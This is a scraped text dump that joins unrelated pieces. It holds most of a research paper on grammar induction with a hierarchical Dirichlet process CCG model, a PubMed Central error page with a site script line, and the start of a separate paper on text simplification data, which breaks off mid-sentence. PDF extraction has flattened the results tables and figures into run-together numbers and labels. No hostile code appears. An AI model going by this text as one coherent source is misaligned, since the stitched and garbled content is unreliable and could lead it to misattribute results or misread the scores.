Dirichlet Processes. In addition, there are several MLE distributions tied to a given symbol for generating rule types, combinators and lexical tokens. categories whose stick weights (βY ) correspond to the frequency of the category in the corpus. Next we build the hierarchical component of our model by choosing an argument distribution (φY ), again over the space of categories, for every parent X/Z. This argument distribution is drawn from the previously defined base DP, allowing for an important level of parameter tying across all argument distributions. While the base DP does define the mean around which all argument distributions are drawn, we also require a notion of variance or precision which de- termines how similar individual draws will be. This precision is determined by the magnitude of the hy- perparameter αY . This hierarchy is paralleled for lexical productions which are drawn from a unigram base DP over terminal symbols controlled by αL. For simplicity we use the same scheme for setting the values for αL as αY . We present experimen- tal results in which we vary the value of αY as a function of the number of outcomes allowed by the grammar for argument categories or the corpus in the case of terminal symbols. Specifically, we set αY = np for conditioning contexts with n out- comes. Since Liang et al. (2009) found that the ideal value for alpha appears to be superlinear but sub- quadratic in n, we present results where p takes the values 0, 1.0, 1.5, and 2.0 to explore the range from uniform to quadratic. This setting for α is the only free parameter in the model. By controlling preci- sion we can tell the model to what extent global cor- pus statistics should be trusted. We believe this has a similar effect to Bisk and Hockenmaier (2012b)’s top-k upweighting and smoothing scheme. One advantage of the argument model is that it only requires a single distribution over categories for each binary tree. In contrast to similar proposals for CFGs (Liang et al., 2007), which impose no formal restrictions on the nonterminals X, Y, Z that can ap- pear in a rewrite rule X → Y Z, this greatly sim- plifies the modeling problem (yielding effectively a model that is more akin to nonparametric HMMs), since it avoids the need to capture correlations be- 79 tween different base distributions for Y and Z. Variational Inference HDPs need to be estimated with approximate techniques. As an alternative to Gibbs sampling (Teh et al., 2006), which is exact, but typically very slow and has no clear convergence criteria, variational inference algorithms (Bishop, 2006; Blei and Jordan, 2004) estimate the parame- ters of a truncated model to maximize a lower bound of the likelihood of the actual model. This allows for factorization of the model and a training procedure analogous to the Inside-Outside algorithm (Lari and Young, 1991), allowing training to run very quickly and in a trivially parallelizable manner. To initialize the base DP’s stick weights, we fol- low the example of Kurihara et al. (2007) and use an MLE model initialized with uniform distributions to compute global counts for the categories in our grammar. When normalized these provide a better initialization than a uniform set of weights. Updates to the distributions are then performed in a coordi- nate descent manner which includes re-estimation of the base DPs. In variational inference, multinomial weights W take the place of probabilities. The weights for an outcome Y with conditioning variable P are com- puted by summing pseudocounts with a scaled mean vector from the base DP. The computation involves moving in the direction of the gradient of the Dirich- let distribution which results in the following differ- ence of Digammas (Ψ): WP (Y ) = Ψ(C(P,Y ) + α P βY ) − Ψ(C(P,∗) + αP ) Importantly, the Digamma and multinomial weights comprise a righ-get-richer scheme, biasing the model against rare outcomes. In addition, since variational inference is done by coordinate descent, it is trivially parallelizeable. In practice, training and testing our models on the corpora containing sen- tences up to length 15 used in this paper takes be- tween one minute to at most three hours on a single 12-core machine depending on their size. 6 Evaluation As is standard for this task, we evaluate our systems against a number of different dependency treebanks, and measure performance in terms of the accuracy of directed dependencies (i.e. the percentage of words in the test corpus that are correctly attached). We use the data from the PASCAL challenge for grammar induction (Gelling et al., 2012), the data from the CoNLL-X shared task (Buchholz and Marsi, 2006) and Goldberg (2011)’s Hebrew corpus. Converting CCG derivations into dependencies is mostly straightforward, since the CCG derivation identifies the root word of each sentence, and head- argument and head-modifier dependencies are easily read off of CCG derivations, since the lexicon de- fines them explicitly. Unlike dependency grammar, CCG is designed to recover non-local dependencies that arise in control and binding constructions as well as in wh-extraction and non-standard coordi- nation, but since this requires re-entrancies, or co- indexation of arguments (Hockenmaier and Steed- man, 2007), within the lexical categories that trigger these constructions, our current system returns only local dependencies. But since dependency gram- mars also captures only local dependencies, this has no negative influence on our current evaluation. However, a direct comparison between depen- dency treebanks and dependencies produced by CCG is more difficult (Clark and Curran, 2007), since dependency grammars allow considerable freedom in how to analyze specific constructions such as verb clusters (which verb is the head?) prepositional phrases and particles (is the head the noun or the preposition/particle?), subordinating conjunctions (is the conjunction a dependent of the head of the main clause and the head of the embed- ded clause a dependent of the conjunction, or vice versa?) and this is reflected in the fact that the tree- banks we consider often apply different conventions for these cases. Although remedying this issue is beyond the scope of this work, these discrepancies very much hint at the need for a better mechanism to evaluate linguistically equivalent structures or tree- bank standardization. The most problematic construction is coordina- tion. In standard CCG-to-dependency schemes, both conjuncts are independent, and the conjunction itself is not attached to the dependency graph, whereas de- pendency grammars have to stipulate that either one of the conjuncts or the conjunction itself is the head, with multiple possibilities of where the remaining 80 constituents attach. In addition to the standard CCG scheme, we have identified five main styles of con- junction in our data (Figure 2), although several cor- pora distinguish multiple types of coordinating con- junctions which use different styles (not all shown here). Since our system has explicit rules for coordi- nation, we transform its output into the desired target representation that is specific to each language. 7 Experiments We evaluate our system on 13 different languages. In each case, we follow the test and training regimes that were used to obtain previously published results in order to allow a direct comparison. We com- pare our system to the results presented at the PAS- CAL Challenge on Grammar Induction (Gelling et al., 2012)6, as well as to Gillenwater et al. (2011) and Naseem et al. (2012). We use Nivre (2006)’s Penn2Malt implementation of Collins (2003)’s head rules to translate the WSJ Penn Treebank (Marcus et al., 1993) into dependencies. Finally, when train- ing the MLE version of our model we use a simple smoothing scheme which defines a small rule proba- bility (e−15) to prevent any rule used during training from going to zero. 7.1 PASCAL Challenge on Grammar Induction In Table 1, we compare the performance of the ba- sic Argument model (MLE), of our HDP model with four different settings of the hyperparameters (as ex- plained above) and of the systems presented in the PASCAL Challenge on Grammar Induction (Gelling et al., 2012). The systems in this competition were instructed to train over the full dataset, including the unlabelled test data, and include Bisk and Hocken- maier (2012a)’s CCG-based system (BH) to Cohn et al. (2010)’s reimplementation of Klein and Manning (2004)’s DMV model in a tree-substitution gram- mar framework (BC), as well as three other de- pendency based systems which either incorporate Naseem et al. (2010)’s rules in a deterministic fash- ion (Søgaard, 2012), rely on extensive tuning on 6Numbers are from personal correspondence with the orga- nizers. The previously published numbers are not comparable to literature due to an error in the evaluation. http://wiki. cs.ox.ac.uk/InducingLinguisticStructure/ ResultsDepComparable the development set (Tu, 2012) or incorporate mil- lions of additional tokens from Wikipedia to esti- mate model parameters (Marecek and Zabokrtsky, 2012). We ignore punctuation for all experiments reported in this paper, but since the training data (but not the evaluation) includes punctuation marks, participants were free to choose whether to include punctuation or ignore it. While BH is the only other system with directly interpretable linguistic output, we also include a di- rect comparison with BC, whose TSG representa- tion is equally expressive to ours. Finally we present a row with the maximum performance among the other three models. As we have no knowledge of how much data was used in the training of other sys- tems we simply present results for systems trained on length 15 (not including punctuation) sentences and then evaluated at lengths 10 and 15. The MLE version of our model shows rather vari- able performance: although its results are particu- larly bad on Basque (Eu), it outperforms both BH and BC on some other settings. By contrast, the HDP system is always better than the MLE model. It outperforms all other systems on half of the cor- pora. On average, it outperforms BH and BC by 10.3% and 9.3% on length 10, or 9.7% and 7.8 % on length 15 respectively. The main reason why our system does not outperform BC by an even higher margin is the very obvious 11.4%/11.5% deficit on Slovene. However, the Slovene dependency tree- bank seems to follow a substantially different anno- tation scheme. In particular, the gold standard an- notation of the 1,000 sentences in the Slovene de- velopment set treats many of them as consisting of independent sentences (often separated by punctua- tion marks that our system has no access to), so that the average number of roots per sentence is 2.7: >> “ verjeti believe ti I , , 〈〈 ” je is mehko soft rekla said When our system is presented with these short components in isolation, it oftentimes analyzes them correctly, but since it has to return a tree with a sin- gle root, its performance degrades substantially. We believe the HDP performs so well as com- pared to the MLE model because of the influence of the shared base distribution, which allows the 81 Ar, Eu, Cs, Nl, WSJ, Ch, He Da, He Es, Bg, De, Pt Sv, Sl Ja noun conj noun noun conj noun noun conj noun noun conj noun noun conj noun Figure 2: In the treebanks used for evaluation different standards exist for annotating coordination. While not exhaustive, this table demonstrates five of the most common schemes used in the literature. Syntactically these are identical and traditionally CCG draws arcs only to the arguments without attaching the conjunction. For the purposes of comparison with the literature we have implemented these five translation schemes. Arabic Danish Slovene Swedish Dutch Basque Portuguese WSJ Childes Czech # Tokens 5,470 25,341 54,032 61,877 78,737 81,345 158,648 163,727 290,604 436,126 # Tags 20 24 36 30 304 14 23 36 69 62 PA SC A L BC 60.8/58.4 44.7/39.4 62.6/57.9 63.2/56.6 51.8/52.0 53.0/48.9 52.4/50.2 68.6/63.3 47.4/46.1 47.9/43.1 Max 67.2/66.8 60.1/56.0 65.6/61.8 72.8/63.4 51.1/47.6 53.7/47.8 67.0/61.8 71.2/64.8 56.0/54.5 58.3/54.4 BH 41.6/43.7 46.4/43.8 49.6/43.9 63.7/57.0 49.7/43.6 45.1/39.6 70.8/67.2 68.2/59.6 61.4/59.8 45.0/38.9 T hi s w or k MLE 41.6/42.9 43.4/39.2 46.1/41.1 70.1/59.7 52.2/47.2 29.6/26.5 62.2/59.7 59.5/52.4 53.3/51.9 50.5/45.8 HDP0.0 48.0/50.0 63.9/58.5 44.8/39.8 67.6/62.1 45.0/33.9 41.6/39.1 71.0/66.0 59.8/52.9 56.3/55.2 54.0/49.0 HDP1.0 45.6/47.1 45.7/42.3 53.9/46.9 74.5/66.9 58.5/54.4 50.1/44.6 65.1/60.6 64.3/56.5 71.5/70.3 55.8/50.7 HDP1.5 49.6/50.4 58.7/54.4 53.2/48.2 74.3/67.1 57.4/54.5 50.6/45.0 70.0/64.7 65.5/57.2 69.6/68.6 55.6/50.3 HDP2.0 66.4/65.1 56.5/49.5 54.2/46.4 71.6/64.1 51.7/48.3 49.4/43.3 76.3/70.5 70.7/62.9 74.1/73.3 54.4/48.5 +/− -0.8/-1.7 +3.8/+2.5 -11.4/-15.4 +1.7/+3.5 +6.7/+2.4 -3.1/-3.9 +5.5/+3.3 -0.5/-1.9 +12.7/+13.5 -2.5/-3.7 Table 1: A comparison of the basic Argument model (MLE) and four hyper-parameter settings of the HDP- CCG against two syntactic formalisms that participated in the PASCAL Challenge (Gelling et al., 2012), BH (Bisk and Hockenmaier, 2012a) and BC (Blunsom and Cohn, 2010), in addition to a max over all other participants. We trained on length 15 data (punctuation removed), including the test data as recommended by the organizers. The last row indicates the difference between our best system and the competition. global category distribution to influence each of the more specific distributions. Further, it provides a very simple knob in the choice of hyperparame- ters, which has a substantial effect on performance. A side effect of the hyperparameters is that their strength also determines the rate of convergence. This may be one of the reasons for the high vari- ance seen in the four settings tested, although we note that since our initialization is always uniform, and not random, consecutive runs do not introduce variance in the model’s performance. 7.2 Comparison with systems that capture linguistic constraints Since our induction algorithm is based on the knowl- edge of which POS tags are nouns and verbs, we compare in Table 2 our system to Naseem et al. (2010), who present a nonparametric dependency model that incorporates thirteen universal linguistic constraints. Three of these constraints correspond to our rules that verbs are the roots of sentences and may take nouns as dependents, but the other ten con- straints (e.g. that adjectives modify nouns, adverbs modify adjectives or verbs, etc.) have no equivalent in our system. Although our system has less prior knowledge, it still performs competitively. On the WSJ, Naseem et al. demonstrate the im- portance and effect of the specific choice of syntactic rules by comparing the performance of their system with hand crafted universal rules (71.9), with En- glish specific rules (73.8), and with rules proposed by Druck et al. (2009) (64.9). The performance of Naseem et al.’s system drops very significantly as sentence length (and presumable parse complexity) 82 Sl Es Da Pt Sv ∼#Tokens 3.8K 4.2K 9.5K 15K 24K N10 50.9 67.2 51.9 71.5 63.3 HDP 56.6 62.1 51.5 74.7 69.8 Table 2: A comparison of our system with Naseem et al. (2010), both trained and tested on the length 10 training data from the CoNLL-X Shared Task. increases, whereas our system shows significantly less decline, and outperforms their universal system by a significant margin.7 ≤ 10 ≤ 20 Naseem Universal Rules 71.9 50.4 Naseem English Rules 73.8 66.1 HDP-CCG 68.2 64.2 HDP-CCG (train ≤ 20) 71.9 In contrast to Spitkovsky et al. (2010), who reported that performance of their dependency based system degrades when trained on longer sentences, our per- formance on length 10 sentences increases to 71.9 when we train on sentences up to length 20. Another system that is also based on CCG, but captures significantly more linguistic knowledge than ours, was presented by Boonkwan and Steed- man (2011), who achieve an accuracy of 74.5 on WSJ10 section 23 (trained on sections 02-22). Us- ing the same settings, our system achieves an accu- racy of 68.4. Unlike our approach, Boonkwan and Steedman do not automatically induce an appropri- ate inventory of lexical category, but use an exten- sive questionnaire that defines prototype categories for various syntactic constructions, and requires sig- nificant manual engineering of which POS tags are mapped to what categories to generate a language- specific lexicon. However, their performance de- grades significantly when only a subset of the ques- tions are considered. Using only the first 14 ques- tions, covering facts about the ordering of subjects, verbs and objects, adjectives, adverbs, auxiliaries, adpositions, possessives and relative markers, they achieve an accuracy of 68.2, which is almost iden- 7Our earlier generative model showed similar behavior, al- though the results in Bisk and Hockenmaier (2012b) are not directly comparable due to differences in the data. Sl Es Da Pt Sv #Tokens 3,857 4,230 9,549 15,015 24,021 G10 51.2 62.4 47.2 54.3 48.6 HDP 57.9 65.4 49.3 73.5 73.2 Bg WSJ Nl Ja De #Tokens 38,220 42,442 43,405 43,501 77,705 G10 59.8 64.4 47.5 60.2 47.4 HDP 66.1 70.3 56.2 64.1 68.4 Table 3: A comparison of our system with Gillenwa- ter et al. (2010), both trained on the length 10 train- ing data, and tested on the length 10 test data, from the CoNLL-X Shared task. tical to ours, even though we use significantly less initial knowledge. However, the lexicons we present below indicate that we are in fact learning many of the very exact details that in their system are con- structed by hand. The remaining 14 questions in Boonkwan and Steedman’s questionnaire cover less frequent phenomena such as the order of negative markers, dative shift, and pro-drop. The obvious ad- vantage of this approach is that this allows them to define a much more fine-grained inventory of lexical categories than our system can automatically induce. We also stipulate that for certain languages knowl- edge of pro-drop could play a significant role in the success of their approach: if complete sentences are allowed to be of the form S\N or S/N, the same lex- ical category can be used for the verb regardless of whether the subject is present or has been dropped. 7.3 Additional Languages In order to provide results on additional languages, we present in Table 3 a comparison to the work of Gillenwater et al. (2010) (G10), using the ConLL-X Shared Task data (Buchholz and Marsi, 2006). Fol- lowing Gillenwater et al., we train only on sentences of length 10 from the training set and evaluate on the test set. Since this is a different training regime, and these corpora differ for many languages from that of the PASCAL challenge, numbers from Table 1 can- not be compared directly with those in Table 3. We have also applied our model to Goldberg (2011)’s Hebrew corpus, where it achieves an accuracy of 62.1 (trained and tested on all sentences length 10; 7,253) and 59.6 (length 15; 21,422 tokens). 83 Arabic % Swedish % WSJ % Childes % Japanese % Czech % VERB (S\N)/N 56 S 45 S\N 52 S/N 44 S 84 S 26 (S/N)/N 29 S\N 20 (S\N)/N 19 S 37 S\N 25 ADP N\N 68 (S\S)/N 49 (S\S)/N 46 (S\S)/N 45 (S/S)\N 44 (S\S)/N 42 N/N 21 (N\N)/N 25 (N\N)/N 20 N/N 25 N\N 23 (S/S)/N 26 NOUN N\N 50 N 91 N 79 N 89 N 73 N 74 N 35 N/N 12 ADJ N\N 82 N/N 50 N/N 70 N/N 46 S/S 64 N/N 55 Figure 3: Partial lexicons demonstrating language specific knowledge learned automatically for five lan- guages. For ease of comparison between languages, we use the universal tag label (Verb, Adposition, Noun and Adjective). Shown are the most common categories and the fraction of occurrences of the tag that are assigned this category (according to the Viterbi parses). 8 The Induced Lexicons Since our approach is based on a lexicalized for- malism such as CCG, our system automatically in- duces lexicons that pair words (or, in our case, POS- tags) with language-specific categories that capture their syntactic behavior. If our approach is success- ful, it should learn the basic syntactic properties of each language, which will be reflected in the corre- sponding lexicon. In Figure 3 one sees how verbs subcategorize differently, how word ordering differs by language, and how the attachment structures of prepositions are automatically discovered and differ across languages. In Arabic, for example, the sys- tem learns that word order is variable and therefore the verb must allow for both SVO and VOS style constructions. We generally learn that adpositions (prepositions or postpositions) take nouns as argu- ments. In Czech, PPs can appear before and after the verb, leading to two different categories ((S\S)/N and (S/S)/N). Japanese has postpositions that ap- pear in preverbal position ((S/S)\N), but when this category is assigned to nominal particles that cor- respond to case markers, it effectively absorbs the noun, leading to a preference for verbs that do not take any arguments (S), and to a misanalysis of ad- jectives as verb modifiers (S/S). Our lexicons also reflect differences in style: while Childes and the WSJ are both English, they represent very different registers. We learn that subjects are mostly absent in the informal speech and child-directed instructions contained in Childes, while effectively mandatory in the Wall Street Journal. 9 Conclusions This paper has introduced a novel factorization for CCG models and showed how when combined with non-parametric Bayesian statistics it can compete with every other grammar induction system cur- rently available, including those that capture a sig- nificant amount of prior linguistic knowledge. The use of a powerful syntactic formalism proves ben- eficial both in terms of requiring very limited uni- versal knowledge and robustness at longer sentence lengths. Unlike standard grammar induction sys- tems that are based on dependency grammar, our system returns linguistically interpretable lexicons for each language that demonstrate it has discov- ered their basic word order. Of particular note is the simplicity of the model both algorithmically and in terms of implementation. By not faltering on longer sentences or requiring extensive tuning, the system can be easily and quickly deployed on a new lan- guage and return state of the art performance and easily interpretable lexicons. In this paper, we have applied this model only to a restricted fragment of CCG, but future work will address the impact of lex- icalization and the inclusion of richer combinators. 10 Acknowledgements This work is supported by NSF CAREER award 1053856 (Bayesian Models for Lexicalized Gram- mars). 84 References Taylor Berg-Kirkpatrick and Dan Klein. 2010. Phyloge- netic Grammar Induction. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 1288–1297, Uppsala, Sweden, July. Christopher Bishop. 2006. Pattern Recognition and Ma- chine Learning. Springer-Verlag, August. Yonatan Bisk and Julia Hockenmaier. 2012a. Induction of Linguistic Structure with Combinatory Categorial Grammars. In NAACL HLT Workshop on Induction of Linguistic Structure, pages 90–95, Montréal, Canada, June. Yonatan Bisk and Julia Hockenmaier. 2012b. Simple Robust Grammar Induction with Combinatory Cate- gorial Grammars. In Proceedings of the Twenty-Sixth Conference on Artificial Intelligence (AAAI-12), pages 1643–1649, Toronto, Canada, July. David M Blei and Michael I Jordan. 2004. Variational Methods for the Dirichlet Process. In Proceedings of the Twenty-First International Conference on Machine Learning (ICML 2004), Banff, Alberta, Canada, July. Phil Blunsom and Trevor Cohn. 2010. Unsupervised Induction of Tree Substitution Grammars for Depen- dency Parsing. Proceedings of the 2010 Conference on Empirical Methods of Natural Language Process- ing, pages 1204–1213, October. Prachya Boonkwan and Mark Steedman. 2011. Gram- mar Induction from Text Using Small Syntactic Proto- types. In Proceedings of 5th International Joint Con- ference on Natural Language Processing, pages 438– 446, Chiang Mai, Thailand, November. Sabine Buchholz and Erwin Marsi. 2006. CoNLL-X Shared Task on Multilingual Dependency Parsing. In Proceedings of the 10th Conference on Computational Natural Language Learning (CoNLL-X), pages 149– 164, New York City, June. Glenn Carroll and Eugene Charniak. 1992. Two Exper- iments on Learning Probabilistic Dependency Gram- mars from Corpora. Working Notes of the Workshop Statistically-Based NLP Techniques, pages 1–13. Eugene Charniak. 1993. Statistical Language Learning. The MIT Press, Cambridge, Massachusetts. Stephen Clark and James R Curran. 2007. Formalism- Independent Parser Evaluation with CCG and Dep- Bank. In Proceedings of the 45th Annual Meeting of the Association of Computational Linguistics, pages 248–255, Prague, Czech Republic, June. Alex Clark. 2001. Unsupervised Language Acquisition: Theory and Practice. Ph.D. thesis, University of Sus- sex, September. Shay B Cohen and Noah A Smith. 2009. Variational Inference for Grammar Induction with Prior Knowl- edge. Proceedings of the ACL-IJCNLP 2009 Confer- ence Short Papers, pages 1–4. Shay B Cohen and Noah A Smith. 2010. Covariance in Unsupervised Learning of Probabilistic Grammars. The Journal of Machine Learning Research, pages 3117–3151, November. Trevor Cohn, Phil Blunsom, and Sharon Goldwater. 2010. Inducing Tree-Substitution Grammars. The Journal of Machine Learning Research, 11:3053– 3096, November. Michael Collins. 2003. Head-Driven Statistical Mod- els for Natural Language Parsing. Computational Lin- guistics, 29(4):589–637, December. Gregory Druck, Gideon Mann, and Andrew McCal- lum. 2009. Semi-supervised Learning of Dependency Parsers using Generalized Expectation Criteria. In Proceedings of the Joint Conference of the 47th An- nual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP, pages 360–368, Suntec, Singapore, Au- gust. Jason Eisner. 1996. Efficient Normal-Form Parsing for Combinatory Categorial Grammar. In Proceedings of the 34th Annual Meeting of the Association for Com- putational Linguistics, pages 79–86, Santa Cruz, Cali- fornia, USA, June. Douwe Gelling, Trevor Cohn, Phil Blunsom, and João V Graca. 2012. The PASCAL Challenge on Grammar Induction. In NAACL HLT Workshop on Induction of Linguistic Structure, pages 64–80, Montréal, Canada, June. Jennifer Gillenwater, Kuzman Ganchev, João V Graca, Fernando Pereira, and Ben Taskar. 2010. Sparsity in Dependency Grammar Induction. In Proceedings of the 48th Annual Meeting of the Association for Com- putational Linguistics, pages 194–199, Uppsala, Swe- den, July. Jennifer Gillenwater, Kuzman Ganchev, João V Graca, Fernando Pereira, and Ben Taskar. 2011. Posterior Sparsity in Unsupervised Dependency Parsing. The Journal of Machine Learning Research, 12:455–490, February. Yoav Goldberg. 2011. Automatic Syntactic Processing of Modern Hebrew. Ph.D. thesis, Ben-Gurion University of the Negev, November. William P Headden III, Mark Johnson, and David Mc- Closky. 2009. Improving Unsupervised Dependency Parsing with Richer Contexts and Smoothing. In Pro- ceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the Association for Computational Linguistics, pages 101–109, Boulder, Colorado, June. Julia Hockenmaier and Yonatan Bisk. 2010. Normal- form parsing for Combinatory Categorial Grammars with generalized composition and type-raising. In 85 Proceedings of the 23rd International Conference on Computational Linguistics (Coling 2010), pages 465– 473, Beijing, China, August. Coling 2010 Organizing Committee. Julia Hockenmaier and Mark Steedman. 2002. Gener- ative Models for Statistical Parsing with Combinatory Categorial Grammar. In Proceedings of 40th Annual Meeting of the Association for Computational Lin- guistics, pages 335–342, Philadelphia, Pennsylvania, USA, July. Julia Hockenmaier and Mark Steedman. 2007. CCG- bank: A Corpus of CCG Derivations and Dependency Structures Extracted from the Penn Treebank. Com- putational Linguistics, 33(3):355–396, September. Yun Huang, Min Zhang, and Chew Lim Tan. 2012. Improved Combinatory Categorial Grammar Induc- tion with Boundary Words and Bayesian Inference. In Proceedings of the 24rd International Conference on Computational Linguistics (Coling 2012), Mumbai, India, December. Ray Jackendoff. 1977. X-Bar Syntax: A Study of Phrase Structure. The MIT Press. Dan Klein and Christopher D Manning. 2004. Corpus- Based Induction of Syntactic Structure: Models of De- pendency and Constituency. In Proceedings of the 42nd Meeting of the Association for Computational Linguistics (ACL’04), Main Volume, pages 478–485, Barcelona, Spain, July. Kenichi Kurihara and Taisuke Sato. 2004. An Appli- cation of the Variational Bayesian Approach to Prob- abilistic Context-Free Grammars. International Joint Conference on Natural Language Language Process- ing Workshop Beyond Shallow Analyses, March. Kenichi Kurihara, Max Welling, and Yee-Whye Teh. 2007. Collapsed Variational Dirichlet Process Mix- ture Models. In Proceedings of the 20th International Joint Conference on Artificial Intelligence (IJCAI07), pages 2796–2801, Hyderabad, India, January. Tom Kwiatkowski, Sharon Goldwater, Luke Zettlemoyer, and Mark Steedman. 2012. A probabilistic model of syntactic and semantic acquisition from child-directed utterances and their meanings. In Proceedings of the 13th Conference of the European Chapter of the As- sociation for Computational Linguistics, pages 234– 244, Avignon, France, April. Association for Compu- tational Linguistics. Karim Lari and Steve J Young. 1991. Applications of stochastic context-free grammars using the Inside- Outside algorithm. Computer speech & language, 5(3):237–257, January. Percy Liang, Slav Petrov, Michael I Jordan, and Dan Klein. 2007. The Infinite PCFG Using Hierarchical Dirichlet Processes. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Lan- guage Processing and Computational Natural Lan- guage Learning (EMNLP-CoNLL), pages 688–697, Prague, Czech Republic. Percy Liang, Michael I Jordan, and Dan Klein. 2009. Probabilistic Grammars and Hierarchical Dirichlet Processes. In The Oxford Handbook of Applied Bayesian Analysis. Oxford University Press. Mitchell P Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a Large Annotated Corpus of English: The Penn Treebank. Computa- tional Linguistics, 19(2):313–330, June. David Marecek and Zdenek Zabokrtsky. 2012. Unsu- pervised Dependency Parsing using Reducibility and Fertility features. In NAACL HLT Workshop on Induc- tion of Linguistic Structure, pages 84–89, Montréal, Canada, June. Tahira Naseem, Harr Chen, Regina Barzilay, and Mark Johnson. 2010. Using Universal Linguistic Knowl- edge to Guide Grammar Induction. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 1234–1244, Cambridge, MA, October. Tahira Naseem, Regina Barzilay, and Amir Globerson. 2012. Selective Sharing for Multilingual Dependency Parsing. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics (Vol- ume 1: Long Papers), pages 629–637, Jeju, Republic of Korea, July. Joakim Nivre. 2006. Inductive Dependency Parsing. Springer. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A Universal Part-of-Speech Tagset. In Proceedings of the 8th International Conference on Language Re- sources and Evaluation (LREC-2012), pages 2089– 2096, Istanbul, Turkey, May. Anders Søgaard. 2012. Two baselines for unsuper- vised dependency parsing. In NAACL HLT Work- shop on Induction of Linguistic Structure, pages 81– 83, Montréal, Canada, June. Valentin I Spitkovsky, Hiyan Alshawi, and Daniel Juraf- sky. 2010. From Baby Steps to Leapfrog: How “Less is More” in Unsupervised Dependency Parsing. In Hu- man Language Technologies: The 2010 Annual Con- ference of the North American Chapter of the Associ- ation for Computational Linguistics, pages 751–759, Los Angeles, California, June. Mark Steedman. 1996. Surface Structure and Interpre- tation. The MIT Press, January. Mark Steedman. 2000. The Syntactic Process. The MIT Press, September. Yee-Whye Teh, Michael I Jordan, Matthew J Beal, and David M Blei. 2006. Hierarchical Dirichlet Pro- 86 cesses. Journal of the American Statistical Associa- tion, 101(476):1566–1581. Yee-Whye Teh. 2006. A Hierarchical Bayesian Lan- guage Model based on Pitman-Yor Processes. In Pro- ceedings of the 21st International Conference on Com- putational Linguistics and 44th Annual Meeting of the Association for Computational Linguistics, pages 985–992, Sydney, Australia, July. Yee-Whye Teh. 2010. Dirichlet Process. In Encyclope- dia of Machine Learning, pages 280–287. Springer. Kewei Tu. 2012. Combining the Sparsity and Unambi- guity Biases for Grammar Induction. In NAACL HLT Workshop on Induction of Linguistic Structure, pages 105–110, Montréal, Canada, June. 87 88 work_j4ovpuq7zvd4pl5l4gebrbzdny ---- wp-p1m-39.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-39.ebi.ac.uk no 265358979 Params is empty 265358979 exception Params is empty 2021/04/06-17:58:06 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265358979 (wp-p1m-39.ebi.ac.uk) Time: 2021/04/06 17:58:06 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_j4ym2limgffn3isereirctplfi ---- Problems in Current Text Simplification Research: New Data Can Help Wei Xu1 and Chris Callison-Burch1 and Courtney Napoles2 1 Computer and Information Science Department University of Pennsylvania {xwe, ccb}@seas.upenn.edu 2 Department of Computer Science Johns Hopkins University courtneyn@jhu.edu Abstract Simple Wikipedia has dominated simplifica- tion research in the past 5 years. In this opinion paper, we argue that focusing on Wikipedia limits simplification research. We back up our arguments with corpus analy- sis and by highlighting statements that other researchers have made in the simplification literature. We introduce a new simplifica- tion dataset that is a significant improvement over Simple Wikipedia, and present a novel quantitative-comparative approach to study the quality of simplification data resources. 1 Introduction The goal of text simplification is to rewrite com- plex text into simpler language that is easier to un- derstand. Research into this topic has many poten- tial practical applications. For instance, it can pro- vide reading aids for people with disabilities (Carroll et al., 1999; Canning et al., 2000; Inui et al., 2003), low-literacy (Watanabe et al., 2009; De Belder and Moens, 2010), non-native backgrounds (Petersen and Ostendorf, 2007; Allen, 2009) or non-expert knowledge (Elhadad and Sutaria, 2007; Siddharthan and Katsos, 2010). Text simplification may also help improve the performance of many natural language processing (NLP) tasks, such as parsing (Chan- drasekar et al., 1996), summarization (Siddharthan et al., 2004; Klebanov et al., 2004; Vanderwende et al., 2007; Xu and Grishman, 2009), semantic role labeling (Vickrey and Koller, 2008), information ex- traction (Miwa et al., 2010) and machine transla- tion (Gerber and Hovy, 1998; Chen et al., 2012), by transforming long, complex sentences into ones that are more easily processed. The Parallel Wikipedia Simplification (PWKP) corpus prepared by Zhu et al. (2010), has become the benchmark dataset for training and evaluating automatic text simplification systems. An associated test set of 100 sentences from Wikipedia has been used for comparing the state-of-the-art approaches. The collection of simple-complex parallel sentences sparked a major advance for machine translation- based approaches to simplification. However, we will show that this dataset is deficient and should be considered obsolete. In this opinion paper, we argue that Wikipedia as a simplification data resource is suboptimal for several reasons: 1) It is prone to automatic sentence align- ment errors; 2) It contains a large proportion of in- adequate simplifications; 3) It generalizes poorly to other text genres. These problems are largely due to the fact that Simple Wikipedia is an encyclopedia spontaneously and collaboratively created for “chil- dren and adults who are learning English language” without more specific guidelines. We quantitatively illustrate the seriousness of these problems through manual inspection and statistical analysis. Our manual inspection reveals that about 50% of the sentence pairs in the PWKP corpus are not sim- plifications. We also introduce a new comparative approach to simplification corpus analysis. In par- ticular, we assemble a new simplification corpus of news articles,1 re-written by professional editors to meet the readability standards for children at multi- 1This Newsela corpus can be requested following the in- structions at: https://newsela.com/data/ 283 Transactions of the Association for Computational Linguistics, vol. 3, pp. 283–297, 2015. Action Editor: Rada Mihalcea. Submission batch: 12/2014; Revision batch 4/2015; Published 5/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. https://newsela.com/data/ Not Aligned (17%) [NORM] The soprano ranges are also written from middle C to A an octave higher, but sound one octave higher than written. [SIMP] The xylophone is usually played so that the music sounds an octave higher than written. Not Simpler [NORM] Chile is the longest north-south country in the world, and also claims of Antarctica as part of its territory. [SIMP] Chile, which claims a part of the Antarctic continent, is the longest country on earth. (33%) [NORM] Death On 1 October 1988, Strauss collapsed while hunting with the Prince of 